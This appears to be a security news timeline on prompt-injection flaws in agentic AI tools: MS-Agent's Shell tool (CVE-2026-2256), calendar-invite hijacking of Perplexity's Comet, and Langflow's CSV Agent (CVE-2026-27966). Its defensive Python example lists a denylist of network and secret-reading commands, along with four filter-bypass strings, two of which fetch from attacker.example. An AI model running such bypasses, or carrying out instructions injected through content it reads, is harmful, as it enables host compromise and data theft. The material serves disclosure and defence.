Prompt-injection RCE risks in agentic AI tools with OS and browser automation
Security researchers and CERT/CC reporting highlighted critical prompt-injection-to-execution paths in agentic AI systems: untrusted content reaches the model, is interpreted as instructions, and is then carried out through connected tools. In ModelScope MS-Agent, CVE-2026-2256 (CVSS 9.8) was reported as a command injection / RCE issue in the framework's Shell tool, where external input is passed to OS command execution without adequate sanitization. The tool's check_safe() filter was a denylist, described as bypassable through obfuscation or alternate shell syntax, so a successful injection yields arbitrary command execution and potentially full compromise of the host running the agent.
Separate research from Zenity Labs described a broader class of agentic AI browser weaknesses (including Perplexity's Comet) in which attackers hijack autonomous workflows using indirect prompt injection delivered through ordinary channels such as a calendar invite. Before patches, this could drive the browser to read local directories and files, exfiltrate data, and in some cases use the agent's existing authenticated sessions to interact with sensitive services, including password managers. A similar execution-model risk was reported in Langflow's CSV Agent as CVE-2026-27966 (CVSS 10.0): allow_dangerous_code=True was hardcoded, which enabled LangChain's python_repl_ast tool and let remote attackers with chat access coerce server-side code execution and full system compromise via prompt injection.

How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
No patch available for MS-Agent at disclosure
At the time CVE-2026-2256 was disclosed, no vendor patch or official statement was available for ModelScope MS-Agent. Recommended mitigations included sandboxing, least privilege, validating trusted content, and replacing denylist filtering with allowlists.
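The following is an added example, not MS-Agent's code and not taken from the CERT/CC advisory: a substring denylist of the kind the reporting describes for the Shell tool's check_safe(), four constructed inputs that pass it while still running the denied binary once a shell re-parses them, and an allowlist replacement that tokenizes without a shell and never lets the model pick the binary or supply metacharacters. The denylist contents, the bypass strings, the allowed binaries and the working-directory argument are all assumptions made for the demonstration.

```python
"""Denylist shell-tool filter next to an allowlist replacement.
Constructed example; MS-Agent's real check_safe() is not reproduced here."""
import re
import shlex
import subprocess
from typing import List

# --- Weak design: substring denylist over the raw command string ---
# Hypothetical denylist; the page does not list MS-Agent's actual patterns.
DENYLIST = ("rm -rf", "curl", "wget", "nc ", "bash -c", "/etc/passwd")


def denylist_check_safe(command: str) -> bool:
    """True when no denied substring occurs. The shell re-parses the string
    afterwards, so any token the shell normalizes away defeats the match."""
    lowered = command.lower()
    return not any(bad in lowered for bad in DENYLIST)


# Constructed inputs a prompt injection could place in the tool's argument.
BYPASSES = [
    "r''m -rf /tmp/x",                                # empty quotes split "rm"
    "cu\\rl http://attacker.example/x",               # shell strips the backslash
    "$(printf 'wg%s' et) http://attacker.example/x",  # binary name built at run time
    "cat /etc/pa*sswd",                               # glob hides the literal path
]


def shell_argv(command: str) -> List[str]:
    """Argv a POSIX shell would hand to execve after quote/escape processing.
    shlex mirrors quoting and backslashes; it does not expand $(...) or globs."""
    return shlex.split(command)


# --- Hardened design: tokenize without a shell, allowlist the binary, constrain args ---
ALLOWED_BINARIES = {"ls", "cat", "head", "wc"}  # assumption: what this agent needs
# Relative paths and flags only: no leading "/", no shell metacharacters, no globs.
SAFE_ARG = re.compile(r"[A-Za-z0-9_.=-][A-Za-z0-9_./=-]*")


def parse_allowlisted(command: str) -> List[str]:
    """Return argv if the binary is allowlisted and every argument is plain,
    otherwise raise PermissionError. No shell is involved at any point."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        raise PermissionError(f"unparseable command: {exc}") from exc
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"binary not allowlisted: {argv[:1]}")
    for arg in argv[1:]:
        if not SAFE_ARG.fullmatch(arg) or ".." in arg:
            raise PermissionError(f"argument rejected: {arg!r}")
    return argv


def is_allowed(command: str) -> bool:
    """Boolean view of parse_allowlisted for policy checks and tests."""
    try:
        parse_allowlisted(command)
        return True
    except PermissionError:
        return False


def run_allowlisted(command: str, workdir: str) -> subprocess.CompletedProcess:
    """Execute with shell=False in a dedicated working directory (assumed to be a
    sandboxed, least-privilege location) and a timeout so the agent cannot hang the host."""
    argv = parse_allowlisted(command)
    return subprocess.run(argv, cwd=workdir, shell=False,
                          capture_output=True, text=True, timeout=5)


if __name__ == "__main__":
    for cmd in BYPASSES:
        print(f"{cmd!r}: denylist safe={denylist_check_safe(cmd)}, "
              f"shell would run {shell_argv(cmd)}, allowlist={is_allowed(cmd)}")
    print(parse_allowlisted("ls -l data"))
```

The denylist passes every bypass because it inspects the string the model wrote, not the argv the shell derives from it; the allowlist inspects only the derived argv, rejects anything it cannot tokenize, and hands the result to subprocess with shell=False, so no later expansion step exists for an injection to exploit. Sandboxing and least privilege on the working directory still apply on top, since even an allowlisted cat can read whatever the agent's user can.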
CERT/CC discloses critical MS-Agent command execution flaw
CERT/CC disclosed CVE-2026-2256, a critical vulnerability in ModelScope MS-Agent that allows prompt-injection-style inputs to trigger malicious OS commands through the built-in Shell tool. The flaw could lead to remote code execution, data theft, file tampering, persistence, and lateral movement.
Zenity publicly discloses agentic AI browser hijacking research
Zenity Labs publicly disclosed a suite of vulnerabilities in agentic AI browsers, including Perplexity Comet, showing that prompt injection via legitimate calendar invites could lead to file access, data exfiltration, and password manager abuse. The research highlighted weak trust boundaries between user intent and agent execution.
Langflow recommends upgrade to version 1.8.0
Langflow's official security advisory recommended updating to version 1.8.0 to remediate CVE-2026-27966. The update changed the default behavior to prevent automatic execution of dangerous code.
Langflow discloses critical CSV Agent RCE flaw
A critical Langflow AI CSV Agent vulnerability, tracked as CVE-2026-27966 and rated 10.0, was publicly disclosed. The flaw stemmed from the CSV Agent node being hardcoded with allow_dangerous_code=True, enabling prompt injection to trigger Python and OS command execution on the server.
Perplexity fixes Comet AI browser vulnerabilities
Perplexity issued a fix for the reported Comet vulnerabilities in February 2026. The patch addressed issues that previously allowed attacker-controlled content to be treated as user intent and trigger sensitive autonomous actions.
Perplexity notified of agentic AI browser vulnerabilities
Zenity Labs reported multiple prompt-injection vulnerabilities affecting agentic AI browsers, including Perplexity Comet, to Perplexity in 2025. The issues showed that malicious calendar invites and indirect prompts could hijack browser agents, access local files, and abuse connected tools.
Sources
5 references tracked.
Insecure Output Handling: Code Injection Through LLM Output (Part 3), Irem Bezci, InfoSec Write-ups, Apr 2026 (infosecwriteups.com)
red-run 2.0: Agent Teams, Kevin O'Riley (blog.blacklanternsecurity.com)
MS-Agent Vulnerability Let Attackers Hijack AI Agent to Gain Full System Control (cybersecuritynews.com)
Researchers discover suite of agentic AI browser vulnerabilities, CyberScoop (cyberscoop.com)
Langflow's AI CSV Agent Vulnerability Allows Remote Code Execution Attacks (cybersecuritynews.com)


